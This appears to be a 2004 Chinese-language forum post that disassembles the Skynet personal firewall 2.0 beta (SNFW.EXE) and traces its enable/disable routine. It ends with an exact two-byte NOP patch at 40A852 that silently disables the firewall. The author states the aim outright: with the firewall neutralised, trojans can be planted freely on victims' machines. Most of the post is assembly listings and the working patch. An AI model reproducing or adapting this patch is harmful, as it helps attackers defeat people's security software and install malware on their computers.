天网太可恶,木马没什么用武之地
137:408D8D CMP BYTE PTR [EDX+12A],0 ;EDX+12A==0表示防火墙已关闭
137:408D94 JZ 408E01 ;跳到打开防火墙的程序段
.
.
.
137:408DD2 CALL 464284 ;若EDX+12A==1表示防火墙已打开
;该CALL调用询问是否关闭防火墙的菜单
137:408DD7 CMP EAX,6 ;EAX==6表示在菜单中选择了“是”
137:408DDA LEA EAX,[EBP-4]
137:408DDD SETZ CL ;if(eax==6) cl=1; else cl=0;
137:408DE0 AND ECX,1 ;这条不用说了吧
137:408DE3 MOV EDX,2
137:408DE8 PUSH ECX
137:408DE9 DEC DWORD PTR [EBP-C]
137:408DEC CALL 4C9008
137:408DF1 POP ECX
137:408DF2 TEST ECX,ECX ;ECX==0否
137:408DF4 JZ 408E01 ;是,则跳到打开防火墙处
137:408DF6 XOR EDX,EDX ;关闭防火墙的程序段参数设定
137:408DF8 MOV EAX,EBX ;EDX==0表示要关闭
137:408DFA CALL 408E1C ;关闭防火墙的主程序
137:408DFF JMP 408E0A ;任务完成!回家吧
137:408E01 MOV DL,1 ;打开防火墙的程序段参数设定
137:408E03 MOV EAX,EBX ;EDX==1表示要打开
137:408E05 CALL 408E1C ;打开防火墙的主程序
137:408E0A MOV ECX,[EBP-28] ;任务完成!回家
137:408E0D MOV FS:[0],ECX
137:408E14 POP EBX
137:408E15 MOV ESP,EBP
137:408E17 POP EBP
137:408E18 RET
看到上面的程序段了吗?别以为把408D94处改为NOP或把408E01处改为XOR EDX,EDX就可以了事,事情没那么简单,因为程序运行时并不经过此程序段,所以我们必须深入下去…………等等,在这之前我有话要说,其实上面的程序是有重复的,可以改为:
TEST ECX,ECX
XOR EDX,EDX
JZ SUB1
MOV EDX,1
SUB1: MOV EAX,EBX
CALL 408E1C
...
...
这样我们就可以节省下9个字节,两个这样的程序,我们就能节约18个字节,三个就是27个字节
言归正传,我们切入408DFA的那个CALL后,可以看到如下的程序:
137:408E1C PUSH EBX
137:408E1D MOV EBX,EAX
137:408E1F PUSH ECX
137:408E20 MOV [ESP],DL ;保存打开/关闭的标志,以后要用
137:408E23 MOV EAX,[EBX+340]
137:408E29 MOV DL,[ESP]
137:408E2C MOV ECX,[EAX]
137:408E2E CALL [ECX+5C]
137:408E31 XOR EDX,EDX
137:408E33 MOV EAX,[EBX+340]
137:408E39 CALL 4874E0
137:408E3E MOV EDX,3
137:408E43 MOV EAX,[EBX+340]
137:408E49 CALL 48757C
137:408E4E XOR EDX,EDX ;很像解密程序,可惜不是(我试过)
137:408E50 MOV DL,[ESP]
137:408E53 CMP EDX,1
137:408E56 SBB EDX,EDX
137:408E58 NEG EDX
137:408E5A MOV EAX,[EBX+358]
137:408E60 CALL 4874E0
137:408E65 CMP BYTE PTR [ESP],0 ;这个吗……也不是(因为我试过)
137:408E69 JZ 408E8A
137:408E6B MOV EDX,8
137:408E70 MOV EAX,[EBX+358]
137:408E76 CALL 48757C
137:408E7B MOV ECX,[4D86D8]
137:408E81 MOV EAX,[ECX]
137:408E83 CALL 404090
137:408E88 JMP 408E9A
137:408E8A MOV EDX,0A
137:408E8F MOV EAX,[EBX+358]
137:408E95 CALL 48757C
137:408E9A MOV EDX,[4D86D8]
137:408EA0 MOV ECX,[EDX]
137:408EA2 MOV DL,[ESP]
137:408EA5 MOV EAX,[ECX+2F8]
137:408EAB CALL 40A834 ;关键啊!!!千万不要过门而不入!
137:408EB0 MOV EAX,EBX
137:408EB2 CALL 408EBC
137:408EB7 POP EDX
137:408EB8 POP EBX
137:408EB9 RET
408EAB处的CALL如下:
137:40A834 PUSH EBX
137:40A835 PUSH ESI
137:40A836 ADD ESP,-8
137:40A839 MOV [ESP],DL
137:40A83C MOV EBX,EAX
137:40A83E PUSH EBX
137:40A83F CALL 40A1E4
137:40A844 POP ECX
137:40A845 TEST AL,AL
137:40A847 JZ 40A884
137:40A849 MOV SI,71060004
137:40A84E CMP BYTE PTR [ESP],0 ;各位看官别眨眼了
137:40A852 JNZ 40A857 ;在这里,我把它改为NOP………
哇哈哈哈…………成功了
137:40A854 ADD ESI,4
137:40A857 PUSH 0
137:40A859 LEA EAX,[ESP+8]
.
.
.
到此为止,大伙看懂了吗??只要把40A852处的两个字节改为NOP,天网就跟没装一样,具体改法如下:
文件:SNFW.EXE
源代码:24 00 75 03 83 (H)
破解码:-- -- 90 90 -- (H)
以上修改在“天网防火墙个人版2.0(BETA),应用程序版本:2.0.2.98,驱动程序版本:02000101”,WINDOWS98系统中测试通过!
好了,现在可以放进木马,大肆屠城了。
加好友 
发短信
Post By:2004/6/20 23:32:00
